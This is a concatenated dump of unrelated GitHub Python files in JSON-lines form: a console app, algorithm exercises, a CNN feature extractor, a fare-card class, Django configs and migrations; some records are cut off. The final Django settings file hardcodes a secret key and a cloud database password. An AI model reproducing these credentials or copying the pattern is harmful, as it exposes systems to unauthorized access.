ET.parse(\"C:\\\\users\\\\robi\\\\desktop\\\\dir\\\\rest\\\\SoapUIResults\\\\response_\"+str(j) +\".xml\")\r\n returnCode = dom.find('returnCode').text\r\n returnMessage = dom.find('returnMessage').text\r\n sheet.cell(row = rwnm, column= 6).value=int(returnCode)\r\n sheet.cell(row = rwnm, column= 7).value=returnMessage\r\n orderz = dom.findall('orders/order')\r\n a=a+(len(orderz))\r\n while i < a+1:\r\n for c in orderz:\r\n # matchingSample = c.find('matchingSample').text\r\n orderCode = c.find('orderCode').text\r\n orderCodeMnemonic = c.find('orderCodeMnemonic').text \r\n returnCode = c.find('returnCode').text\r\n returnMessage = c.find('returnMessage').text\r\n # stabilityFlag = c.find('stabilityFlag').text\r\n #print (matchingSample,orderCode,orderCodeMnemonic)\r\n # outsheet.write(i,0,matchingSample)\r\n sheet.cell(row = rwnm, column= 2).value=int(orderCode)\r\n sheet.cell(row = rwnm, column= 3).value=orderCodeMnemonic\r\n sheet.cell(row = rwnm, column= 4).value=int(returnCode)\r\n sheet.cell(row = rwnm, column= 5).value=returnMessage\r\n i += 1 \r\n rwnm=rwnm+1\r\n#print(returnCode)\r\n#print(returnMessage)\r\n# outsheet.write(\"A1\",\"MATCHING SAMPLE\")\r\n# outsheet.write(\"B1\",\"orderCode\")\r\n# outsheet.write(\"C1\",\"orderCodeMnemonic\")\r\n# outsheet.write(\"A2\",matchingSample)\r\n# outsheet.write(\"B2\",orderCode)\r\n# outsheet.write(\"C2\",orderCodeMnemonic)\r\nwb.save(\"C:\\\\users\\\\robi\\\\desktop\\\\new1.xlsx\") \r\n","repo_name":"ramitrehal/ADT_addtest","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17688455851","text":"#coding:utf8\n\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^save_db_info/$', views.save_db_info, name='save_db_info'),\n url(r'^table_list/$', views.table_list, name='table_list'),\n url(r'^generate_code/$', views.generate_code, name='generate_code'),\n url(r'^generate_markdown/$', views.generate_markdown, name='generate_markdown'),\n]","repo_name":"t3573393/django_admin_db_reverse","sub_path":"django_project/db_reverse/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35833431301","text":"#!/usr/bin/env python3\r\n\r\nimport os\r\nimport sys\r\nimport threading\r\nimport numpy as np\r\nimport yaml\r\nimport pickle\r\nimport pdb\r\nimport re\r\nfrom PIL import Image, ImageFile\r\nimport torch\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport torch.utils.data as data\r\nimport torchvision.models as models\r\nfrom torchvision.models import resnet50\r\nfrom torchvision.models import resnet18\r\nfrom torchvision import transforms\r\nfrom joblib import Parallel, delayed\r\n\r\nimport threading\r\nimport time\r\nimport multiprocessing\r\n\r\nImageFile.LOAD_TRUNCATED_IMAGES = True\r\n\r\n\r\ndef get_cnn_features_from_image(img, cnn_feat_video_filename):\r\n # Receives filename of downsampled video and of output path for features.\r\n # Extracts features in the given keyframe_interval. 
Saves the features as a compressed NumPy (.npz) file.\r\n    print(\"Processing {}\".format(cnn_feat_video_filename))\r\n    x = Variable(transform(img))\r\n    x = x.unsqueeze(0)\r\n    my_embedding = torch.zeros(1, 2048, 1, 1)\r\n\r\n    def copy_data(m, i, o):\r\n        my_embedding.copy_(o.data)\r\n\r\n    h = layer.register_forward_hook(copy_data)\r\n    h_x = model(x)\r\n    h.remove()\r\n    z = my_embedding.data.numpy()\r\n    z = z.squeeze(-1).squeeze(-1)\r\n    np.savez(cnn_feat_video_filename, z)\r\n    print(\"Saved {}\".format(cnn_feat_video_filename))\r\n\r\n\r\ndef chunkIt(seq, num):\r\n    avg = len(seq) / float(num)\r\n    out = []\r\n    last = 0.0\r\n\r\n    while last < len(seq):\r\n        out.append(seq[int(last):int(last + avg)])\r\n        last += avg\r\n\r\n    return out\r\n\r\n\r\ndef get_cnn_features(fread):\r\n    i = 0\r\n    for image_name in fread:\r\n        image_filename = os.path.join(image_folder_path, image_name)\r\n        cnn_feat_filename = os.path.join(cnn_features_folderpath, image_name)\r\n        try:\r\n            img = Image.open(image_filename).convert('RGB')\r\n            if not os.path.isfile(image_filename):\r\n                print(\"{} File not found!\".format(image_filename))\r\n                continue\r\n            if os.path.exists(cnn_feat_filename+\".npz\"):\r\n                # print(\"{} Skipped\".format(cnn_feat_filename))\r\n                continue\r\n            get_cnn_features_from_image(img,\r\n                                        cnn_feat_filename)\r\n        except Exception:\r\n            print(\"{} Exception\".format(image_filename))\r\n            continue\r\n        i += 1\r\n        if i % 500 == 0:\r\n            print(\"Processed {}\".format(i))\r\n\r\n\r\nif __name__ == '__main__':\r\n    print(sys.argv)\r\n    if len(sys.argv) != 3:\r\n        print(\"Usage: {0} image_folder features_folder\".format(sys.argv[0]))\r\n        print(\"image_folder -- folder containing the input images\")\r\n        print(\"features_folder -- folder where the .npz features are written\")\r\n        exit(1)\r\n\r\n    image_folder_path = sys.argv[1]\r\n    cnn_features_folderpath = sys.argv[2]\r\n\r\n    if not os.path.exists(cnn_features_folderpath):\r\n        os.mkdir(cnn_features_folderpath)\r\n\r\n    # Loop over all images (training, val, testing)\r\n    # TODO: get SURF features for all videos but only from keyframes\r\n\r\n    fread = [f for f in os.listdir(image_folder_path)] #if re.match(r'[0-9]+.*\\.jpg', f)]\r\n    print(len(fread))\r\n    lines = chunkIt(fread, 1)\r\n    print(len(lines))\r\n    i = 0\r\n\r\n    _transforms = list()\r\n    _transforms.append(transforms.Resize((256, 256)))\r\n    _transforms.append(transforms.CenterCrop(224))\r\n    _transforms.append(transforms.ToTensor())\r\n    transform = transforms.Compose(_transforms)\r\n\r\n    arch = \"resnet50\"\r\n    model_file = '%s_places365.pth.tar' % arch\r\n    if not os.access(model_file, os.W_OK):\r\n        weight_url = 'http://places2.csail.mit.edu/models_places365/' + model_file\r\n        os.system('wget ' + weight_url)\r\n\r\n    model = models.__dict__[arch](num_classes=365)\r\n    checkpoint = torch.load(model_file, map_location=lambda storage, loc: storage)\r\n    state_dict = {str.replace(k,'module.',''): v for k,v in checkpoint['state_dict'].items()}\r\n    model.load_state_dict(state_dict)\r\n    model.eval()\r\n    layer = model._modules.get('avgpool')\r\n\r\n    # cnn.cuda()\r\n    print(\"Initialized!\")\r\n    # Remove final classifier layer\r\n    start = time.time()\r\n    print(\"Time: {}\".format(start))\r\n\r\n    Parallel(n_jobs=16)(delayed(get_cnn_features)(line) for line in lines)
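\r\n    # (added note) the joblib call above replaces the commented-out threading\r\n    # attempt below; if reused, the per-image forward pass could also run under\r\n    # torch.no_grad() to skip autograd bookkeeping, e.g.\r\n    #   with torch.no_grad():\r\n    #       h_x = model(x)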
\r\n    # thread = [None for _ in range(len(lines))]\r\n    # my_embedding = [None for _ in range(len(lines))]\r\n    #\r\n    # for i in range(0, len(thread)):\r\n    #     print(len(lines[i]))\r\n    #     thread[i] = threading.Thread(target=get_cnn_features,\r\n    #                                  args=(lines[i],))\r\n    #\r\n    # for i in range(0, len(thread)):\r\n    #     thread[i].start()\r\n    #\r\n    # for i in range(0, len(thread)):\r\n    #     thread[i].join()\r\n\r\n    print(\"Time: {}\".format(time.time()-start))","repo_name":"richcode6/Visual-Storytelling","sub_path":"cnn_feat_extraction.py","file_name":"cnn_feat_extraction.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12477436193","text":"from oyster.trip import Trip\n\n\nclass NotEnoughBalance(Exception):\n    pass\n\n\nclass Card:\n    \"\"\"\n    Class that models an Oyster card with its main functions\n\n    Parameters\n    ----------\n    balance : float\n        current balance of the oyster card\n    trip : Trip\n        instance of class trip\n\n    Attributes\n    ----------\n    tube_max_fare : float\n        max fare for tube service\n    bus_max_fare : float\n        max fare for bus service\n    \"\"\"\n    tube_max_fare = 3.20\n    bus_max_fare = 1.80\n\n    def __init__(self, balance=0):\n        self.balance = balance\n        self.trip = Trip()\n\n    def top_up(self, amount):\n        \"\"\"Tops up the card with an amount; also used to refund the difference between the max fare and the trip fare.\n\n        Parameters\n        ----------\n        amount : float\n            The amount to top up\n        \"\"\"\n        self.balance += amount\n\n    def subtract_amount(self, amount):\n        \"\"\"Subtracts the trip price from the balance.\n\n        Parameters\n        ----------\n        amount : float\n            The amount to subtract\n        \"\"\"\n        self.balance -= amount\n\n    def view_balance(self):\n        \"\"\"Returns a printable message with the remaining balance.\n\n        Returns\n        -------\n        str\n            Message with the current balance on the card\n        \"\"\"\n        return 'The balance left in your card is: £{:.2f}'.format(self.balance)\n\n    def swipe_in(self, trip_type, station_name=None):\n        \"\"\"Subtracts the max fare from the balance and sets the trip type and origin station name.\n\n        Parameters\n        ----------\n        trip_type : str\n            Type of trip\n        station_name : str\n            Name of origin station\n\n        Raises\n        ------\n        NotEnoughBalance\n            Not enough balance\n        \"\"\"\n        if trip_type == 'tube' and 0 <= self.balance < self.tube_max_fare:\n            raise NotEnoughBalance(\n                'Sorry but you do not have enough balance.\\nCurrent balance: £{}\\n Please top up your card.'.format(\n                    self.balance))\n        elif trip_type == 'bus' and 0 <= self.balance < self.bus_max_fare:\n            raise NotEnoughBalance(\n                'Sorry but you do not have enough balance.\\nCurrent balance: £{}\\n Please top up your card.'.format(\n                    self.balance))\n        self.subtract_amount(self.tube_max_fare) if trip_type == 'tube' else self.subtract_amount(self.bus_max_fare)\n        self.trip.type = trip_type\n        self.trip.orig_station = station_name\n\n    def swipe_out(self, station_origin_zone, station_destination_zone):\n        \"\"\"Calculates the proper fare and replaces the charged max fare with it.\n\n        Parameters\n        ----------\n        station_origin_zone : str\n            Origin station zone\n        station_destination_zone : str\n            Destination station zone\n        \"\"\"\n        fare = self.trip.calculate_trip_fare(station_origin_zone, station_destination_zone)\n        self.top_up(self.tube_max_fare - fare)\n\n    @classmethod\n    def increase_tube_or_bus_max_fare_price(cls, service_type, price):\n        \"\"\"Updates the tube or bus max fare price.\n\n        Parameters\n        ----------\n        price : float\n            Price of the new max fare\n        service_type : str\n            Type of service\n        \"\"\"\n        if service_type == 'tube':\n            cls.tube_max_fare = price\n        else:\n            cls.bus_max_fare = price
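\n\n\n# Example usage (added for illustration; Trip.calculate_trip_fare is assumed\n# to map the two zones to a fare):\n#     card = Card(balance=10)\n#     card.swipe_in('tube', 'Holborn')   # max fare held on entry\n#     card.swipe_out(1, 1)               # difference refunded on exit\n#     card.view_balance()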
\n","repo_name":"TravisClub/oyster-card","sub_path":"oyster/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6626887937","text":"from collections import deque\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, -1, 1]\n\nt = int(input())\n\ndef bfs(ground, x, y):\n    que = deque()\n    ground[x][y]=0\n    que.append((x,y))\n\n    while que:\n\n        a, b = que.popleft()\n        for po in range(4):\n            dxx = a + dx[po]\n            dyy = b + dy[po]\n            if -1 < dxx < len(ground) and -1 < dyy < len(ground[0]) and ground[dxx][dyy]:  # NB: the record is truncated here; this bounds check and enqueue are the standard flood-fill step, reconstructed from context\n                ground[dxx][dyy] = 0\n                que.append((dxx, dyy))\n\npt1 = r'\\.show\\(\"' # <class name>.show()\npt2 = r'\\.destroy\\(\"' # <class name>.destroy()\npt3 = r'\\.update\\(\"'\n# <class name>.update(<id>, <attribute name>, <attribute value>)\n\n# Inbuilt Models\nModels = [\"BaseModel\", \"User\", \"State\", \"City\",\n          \"Amenity\", \"Place\", \"Review\"]\n\n\ndef update_line_check(line):\n    \"\"\"\n    checks the conditions for the update feature\n\n    Args:\n        line: string representation of the command\n\n    Returns:\n        Bool: True if the conditions pass else False\n    \"\"\"\n    if line[-2:] == '\")' or line[-1] == \")\" and \\\n            line[-2].isnumeric() or line[-1] == \")\":\n        return True\n    else:\n        return False\n\n\ndef update_line_dict_check(line):\n    \"\"\"\n    checks the conditions for the update feature for dictionaries\n\n    Args:\n        line: string representation of the command\n\n    Returns:\n        Bool: True if the conditions pass else False\n    \"\"\"\n    if re.search(dictionary_pattern, line):\n        return True\n    else:\n        return False\n\n\ndef update_to_dict(line):\n    \"\"\"\n    handles parsing of a command from the command line\n    for updating with a dictionary\n\n    Args:\n        line: string representation of the command\n\n    Returns:\n        Tuple: class name, uuid, dictionary\n    \"\"\"\n    uuid_match = re.search(uuid_pattern, line)\n    dictionary_match = re.search(dictionary_pattern, line)\n    class_name_match = re.search(class_name_pattern, line)\n\n    cls_name = class_name_match.group()\n    cls_name = cls_name[:-7]\n\n    uuid = uuid_match.group()\n\n    d = dictionary_match.group()\n    d = d.replace(\"'\", '\"')\n    d = json.loads(d)\n\n    return cls_name, uuid, d\n\n\ndef check_all_conditions(line):\n    \"\"\"\n    checks the conditions for the .show, .destroy and .update features\n\n    Args:\n        line: string representation of the command\n\n    Returns:\n        Bool: True if the conditions pass else False\n    \"\"\"\n    if re.finditer(f'{pt1}|{pt2}|{pt3}', line) and \\\n            line[-2:] == '\")' or re.finditer(r'\\d\\)$', line[-2]):\n        return True\n    else:\n        return False\n\n\nclass HBNBCommand(cmd.Cmd):\n    \"\"\"The HBNBCommand class is a subclass of the cmd.Cmd class in Python.\n\n    This class provides a command-line interface for interacting with the\n    application. 
It includes methods for various commands like create,\n show, destroy, update, etc.\n\n Attributes:\n prompt (str): The prompt to display in the command-line interface.\n\n Methods:\n do_quit(line): Quit command to exit the program.\n do_EOF(line): Exit the program when EOF is reached (Ctrl+D).\n emptyline(): Override the default behavior of emptyline.\n do_create(line): Creates a new instance of a class based on the\n input argument.\n help_create(): Provides assistance or guidance in\n creating something.\n do_show(line): Display information about an instance.\n help_show(): Display information about the show command.\n do_destroy(line): Deletes an instance based on the id\n and class name.\n help_destroy(): Display information about the destroy command.\n do_all(line): Prints all instances of a class.\n help_all(): Display help text for the command all().\n do_update(line): Performs an update operation on an\n instance's attributes.\n help_update(): Display help text for the command update().\n default(line): Handles custom commands.\n \"\"\"\n prompt = \"(hbnb) \"\n\n def do_quit(self, line):\n \"\"\"Quit command to exit the program\n \"\"\"\n return True\n\n def do_EOF(self, line):\n \"\"\"Exit the program when EOF is reached (Ctrl+D)\n \"\"\"\n return True\n\n def emptyline(self):\n \"\"\"Override the default behavior of emptyline.\n \"\"\"\n pass\n\n def do_create(self, line):\n \"\"\"Creates a new instance of a class based on the input argument.\n\n Args:\n line (str): The input command string.\n\n If the class name is missing, it prints '** class name missing **'.\n\n \"\"\"\n if not line:\n print(\"** class name missing **\")\n return\n\n try:\n new_instance = eval(line.split()[0])()\n new_instance.save()\n print(new_instance.id)\n except Exception:\n print(\"** class doesn't exist **\")\n\n def help_create(self):\n \"\"\"\n provides assistance or guidance in creating something.\n \"\"\"\n print('\\n'.join(['create [Model]',\n 'Creates a new instance of an inbuilt Model',\n 'If the class name is missing\\n\\t'\n 'print ** class name missing **']))\n\n def do_show(self, line):\n \"\"\"Display information about an instance.\n\n Args:\n line (str): The input command string.\n\n If the class name or instance id is missing, it prints\n the appropriate message.\n \"\"\"\n args = line.split()\n lth = len(args)\n if lth < 1:\n print(\"** class name missing **\")\n return\n elif lth < 2:\n print(\"** instance id missing **\")\n return\n class_name = False\n try:\n instance = storage.all()\n for i, k in instance.items():\n if k[\"__class__\"] == args[0]:\n class_name = True\n if k[\"id\"] == args[1]:\n print(k)\n return\n\n if class_name:\n print(\"** no instance found **\")\n else:\n print(\"** class doesn't exist **\")\n except Exception:\n pass\n\n def help_show(self):\n \"\"\"\n display information or documentation about the\n show command\n \"\"\"\n print('\\n'.join(['show [Model] ',\n 'Prints the string representation of an instance',\n 'based on the class name and id']))\n\n def do_destroy(self, line):\n \"\"\"Deletes an instance based on the id and class name.\n\n Args:\n line (str): The input command string.\n\n If the class name or instance id is missing, it prints the\n appropriate message.\n \"\"\"\n args = line.split()\n lth = len(args)\n if lth < 1:\n print(\"** class name missing **\")\n return\n elif lth < 2:\n print(\"** instance id missing **\")\n return\n\n instance = storage.all()\n class_name = False\n instance_id = False\n for i, k in instance.items():\n if 
k[\"__class__\"] == args[0]:\n class_name = True\n if k[\"id\"] == args[1]:\n instance_id = True\n break\n\n if instance_id and class_name:\n try:\n del instance[f\"{args[0]}.{args[1]}\"]\n with open(\"models/engine/instances.json\", \"w\",\n encoding=\"utf-8\") as file:\n json.dump(instance, file)\n storage.reload()\n except Exception:\n pass\n elif class_name:\n print(\"** no instance found **\")\n else:\n print(\"** class doesn't exist **\")\n\n def help_destroy(self):\n \"\"\"\n prints help text to STDOUT about the destroy command.\n \"\"\"\n print('\\n'.join(['destroy [Model] ',\n 'Deletes an instance',\n 'based on the class name and id']))\n\n def do_all(self, line):\n \"\"\"Prints all instances of a class.\n\n Args:\n line (str): The input command string.\n\n If the class name is missing or the class doesn't exist,\n it prints the appropriate message.\n \"\"\"\n args = line.split()\n if len(args) == 1:\n class_present = False\n for key, value in storage.all().items():\n if value[\"__class__\"] == args[0]:\n class_present = True\n if class_present:\n print([f\"[{value['__class__']}] ({value['id']}) {value}\"\n for value in storage.all().values()\n if value[\"__class__\"] == args[0]])\n elif not class_present:\n print(\"** class doesn't exist **\")\n elif len(line) < 1:\n print([f\"[{value['__class__']}] ({value['id']}) {value}\"\n for value in storage.all().values()])\n else:\n self.default(line)\n\n def help_all(self):\n \"\"\"\n prints Help text for the command all()\n \"\"\"\n print('\\n'.join(['all',\n 'all [Model]',\n 'Prints all string representation of all '\n 'instances',\n 'based or not on the class name.']))\n\n def do_update(self, line):\n \"\"\"Performs an update operation on an instance's attributes.\n\n Args:\n line (str): The input command string.\n\n If the class name, instance id, attribute name,\n or value is missing, it prints the appropriate message.\n \"\"\"\n args = line.split()\n length = len(args)\n if length == 3:\n print(\"** value missing **\")\n return\n elif length == 2:\n print(\"** attribute name missing **\")\n return\n elif length == 1:\n print(\"** instance id missing **\")\n return\n elif length == 0:\n print(\"** class name missing **\")\n if len(args) >= 4:\n instance = storage.all()\n class_name = False\n instance_id = False\n for i, k in instance.items():\n if k[\"__class__\"] == args[0]:\n class_name = True\n if k[\"id\"] == args[1]:\n instance_id = True\n\n if instance_id and class_name:\n try:\n old = instance[f\"{args[0]}.{args[1]}\"]\n value = args[3]\n value = value.replace('\"', '')\n if value.isdigit():\n if float(value).is_integer():\n value = int(float(value))\n else:\n value = float(value)\n old[args[2]] = value\n new_instance = eval(args[0])(**old)\n storage.new(new_instance)\n return\n except Exception:\n pass\n if class_name and not instance_id:\n print(\"** no instance found **\")\n return\n elif not class_name:\n print(\"** class doesn't exist **\")\n\n def help_update(self):\n \"\"\"\n prints Help text for the command update()\n \"\"\"\n print('\\n'.join(['update',\n 'updates an instance,'\n 'based on class name, '\n 'id, attribute name and value']))\n\n def default(self, line):\n \"\"\"Handles custom commands.\n \"\"\"\n try:\n if line.find(\".all()\") != -1:\n st_idx = line.find(\".all()\")\n self.do_all(line[:st_idx])\n elif line.find(\".count()\") != -1:\n st_idx = line.find(\".count()\")\n i = 0\n class_present = False\n for key, value in storage.all().items():\n if value[\"__class__\"] == line[:st_idx]:\n class_present = 
True\n i += 1\n if class_present:\n print(i)\n elif not class_present:\n print(\"** class doesn't exist **\")\n elif check_all_conditions(line):\n call = True\n match = re.finditer(f'{pt1}|{pt2}|{pt3}', line)\n for mat in match:\n if mat.group() == '.destroy(\"':\n call = False\n st_idx = line.find('.destroy(\"')\n if line[-2:] == '\")':\n command = (f\"{line[:st_idx]} \"\n f\"{line[st_idx + 10:-2]}\")\n self.do_destroy(command)\n else:\n super().default(line)\n elif mat.group() == '.show(\"':\n call = False\n st_idx = line.find('.show(\"')\n if line[-2:] == '\")':\n command = (f\"{line[:st_idx]} \"\n f\"{line[st_idx + 7:-2]}\")\n self.do_show(command)\n else:\n super().default(line)\n elif mat.group() == '.update(\"':\n call = False\n if update_line_dict_check(line):\n cls_name, u_id, dic = update_to_dict(line)\n for key, value in dic.items():\n command = (f\"{cls_name} {u_id} \"\n f\"{key} {value}\")\n self.do_update(command)\n elif update_line_check(line):\n my_list = []\n split_text = re.split(r'[\\s, \", \\, \\), \\(]',\n line)\n for arg in split_text:\n if arg != '':\n my_list.append(arg)\n my_list[0] = my_list[0][:-7]\n list_length = len(my_list)\n if list_length > 0:\n class_name = my_list[0]\n command = class_name\n if list_length > 1:\n instance_id = my_list[1]\n command += f\" {instance_id}\"\n if list_length > 2:\n attribute_name = my_list[2]\n command += f\" {attribute_name}\"\n if list_length > 3:\n attribute_value = my_list[3]\n command += \\\n f\" {attribute_value}\"\n self.do_update(command)\n else:\n self.do_update(command)\n else:\n self.do_update(command)\n else:\n self.do_update(command)\n else:\n pass\n else:\n super().default(line)\n if call:\n super().default(line)\n else:\n super().default(line)\n except IndexError as e:\n super().default(line)\n\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n","repo_name":"Ossai6/AirBnB_clone","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":16033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74546079412","text":"from time import time\n#O(n^3)\ndef find_m(alist):\n start = time()\n global_max = 0\n for i in range(len(alist)):\n local_max = 0\n for j in range(i, len(alist)):\n sum = 0\n for k in range(i, j+1):\n sum += alist[k]\n local_max = local_max if local_max > sum else sum\n global_max = local_max if local_max > global_max else global_max\n end = time() - start\n return (global_max, end)\n\n#O(n^2)\ndef find_m2(alist):\n start = time()\n global_max = 0\n for i in range(len(alist)):\n local_max, sum = 0, 0\n for j in range(i, len(alist)):\n sum += alist[j]\n local_max = sum if sum > local_max else local_max\n global_max = local_max if local_max > global_max else global_max\n end = time() - start\n return (global_max, end)\n\n#O(nlogn)\ndef find_m3(alist):\n if len(alist) == 1:\n return max(alist[0], 0)\n\n mid = 0 + (len(alist) - 0) // 2\n left_max = find_m3(alist[:mid])\n right_max = find_m3(alist[mid:])\n max_leftright = max(left_max, right_max)\n\n sum_a, max_leftborder= 0, 0\n for i in range(mid, -1, -1):\n sum_a += alist[i]\n max_leftborder = sum_a if sum_a > max_leftborder else max_leftborder\n\n sum_b, max_rightborder = 0, 0\n for j in range(mid+1, len(alist)):\n sum_b += alist[j]\n max_rightborder = sum_b if sum_b > max_rightborder else max_rightborder\n return max(max_leftright, max_leftborder+max_rightborder)\n\n#O(n)\ndef find_m4(alist):\n local_max = alist[0]\n global_max = 0\n for i in range(1, 
len(alist)):\n        # Kadane's step: extend the previous run or start fresh at alist[i]\n        local_max = max(alist[i], local_max + alist[i])\n        global_max = max(local_max, global_max)\n    # alist[0] alone is never visited by the loop above, and the empty subarray\n    # counts as 0, as in find_m/find_m2\n    return max(global_max, alist[0], 0)\n\n\nif __name__ == '__main__':\n    a = [-2, 1, -3, 4, -1, 2, 1, -5, 4]\n    start = time()\n    result_1 = find_m(a)\n    end_1 = time() - start\n    start = time()\n    result_2 = find_m2(a)\n    end_2 = time() - start\n    start = time()\n    result_3 = find_m3(a)\n    end_3 = time() - start\n    start = time()\n    result_4 = find_m4(a)\n    end_4 = time() - start\n    print(result_1, result_2, result_3, result_4, end_1, end_2, end_3, end_4)","repo_name":"yuzhecd/al_py","sub_path":"Divide_conquer/Find_maxsequence.py","file_name":"Find_maxsequence.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6160589978","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('documents', '0009_auto_20151119_1609'),\n        ('curriculum', '0008_auto_20160116_1428'),\n        ('resources', '0005_resourceset_lessons'),\n        ('artifacts', '0008_auto_20151119_1609'),\n        ('scholars', '0004_auto_20151023_0933'),\n        ('connections', '0007_auto_20171109_1548'),\n        ('maps', '0007_auto_20151022_2133'),\n        ('videos', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='video',\n            name='artifacts',\n            field=models.ManyToManyField(verbose_name='Artifacts related to this item', blank=True, to='artifacts.Artifact'),\n        ),\n        migrations.AddField(\n            model_name='video',\n            name='audiovisuals',\n            field=models.ManyToManyField(verbose_name='Related Media (slimbox)', blank=True, to='connections.Audiovisual'),\n        ),\n        migrations.AddField(\n            model_name='video',\n            name='biblio',\n            field=models.ManyToManyField(verbose_name='Further Study (slimbox)', blank=True, to='connections.Biblio'),\n        ),\n        migrations.AddField(\n            model_name='video',\n            name='connections',\n            field=models.ManyToManyField(verbose_name='Related PDFs (new tab)', blank=True, to='connections.Connection'),\n        ),\n        migrations.AddField(\n            model_name='video',\n            name='documents',\n            field=models.ManyToManyField(verbose_name='Documents related to this item', blank=True, to='documents.Document'),\n        ),\n        migrations.AddField(\n            model_name='video',\n            name='essays',\n            field=models.ManyToManyField(verbose_name='Background Info (slimbox)', blank=True, to='connections.Essay'),\n        ),\n        migrations.AddField(\n            model_name='video',\n            name='lectures',\n            field=models.ManyToManyField(verbose_name='Lectures (full page)', blank=True, to='scholars.Lecture'),\n        ),\n        migrations.AddField(\n            model_name='video',\n            name='lessons',\n            field=models.ManyToManyField(verbose_name='Lesson PDFs (new tab)', blank=True, to='curriculum.Lesson'),\n        ),\n        migrations.AddField(\n            model_name='video',\n            name='maps',\n            field=models.ManyToManyField(verbose_name='Maps (full page)', blank=True, to='maps.Geomap'),\n        ),\n        migrations.AddField(\n            model_name='video',\n            name='resourcesets',\n            field=models.ManyToManyField(verbose_name='Choose Resource Sets this item belongs to', blank=True, to='resources.Resourceset'),\n        ),\n        migrations.AddField(\n            model_name='video',\n            name='weblinks',\n            field=models.ManyToManyField(blank=True, to='connections.Weblink'),\n        ),\n        migrations.AlterField(\n            model_name='video',\n            name='video_source',\n            field=models.CharField(verbose_name='source url', max_length=128, blank=True, default=''),\n        ),\n        
]\n","repo_name":"DigitalGizmo/mse21","sub_path":"mse/videos/migrations/0002_auto_20171127_1445.py","file_name":"0002_auto_20171127_1445.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38180442856","text":"import os\nimport datetime\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nSECRET_KEY = 's$g^n1!&9wg(2^m)ls1&8#vgl3z3_48qb-fi08l&ey&w4$d5kp'\nDEBUG = False\nADMINS = [('Shun', 'klon.unicorn@gmail.com')]\nMANAGERS = ADMINS\nALLOWED_HOSTS = [\n 'localhost',\n '127.0.0.1',\n 'klon-production.ap-northeast-1.elasticbeanstalk.com',\n 'd2lsr90acgtyop.cloudfront.net',\n 'klongroup.com',\n]\nALLOWED_CIDR_NETS = ['172.31.0.0/16',]\n\nINSTALLED_APPS = [\n 'home.apps.HomeConfig',\n 'api.apps.ApiConfig',\n\n 'django_filters',\n 'storages',\n 'multiselectfield',\n 'corsheaders',\n 'phonenumber_field',\n\n 'rest_framework',\n 'rest_framework.authtoken',\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'rest_auth',\n 'rest_auth.registration',\n\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n]\n\nSITE_ID = 1\n\nMIDDLEWARE = [\n 'corsheaders.middleware.CorsMiddleware',\n 'allow_cidr.middleware.AllowCIDRMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'klon.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages'\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'klon.wsgi.application'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'klon',\n 'USER': 'klon',\n 'PASSWORD': '68YSehZhc8Ph8Pd',\n 'HOST': 'klon.cd8iujepsg4q.ap-northeast-1.rds.amazonaws.com',\n 'PORT': '5432',\n }\n}\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': [\n 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'\n ],\n 'DEFAULT_AUTHENTICATION_CLASSES': [\n 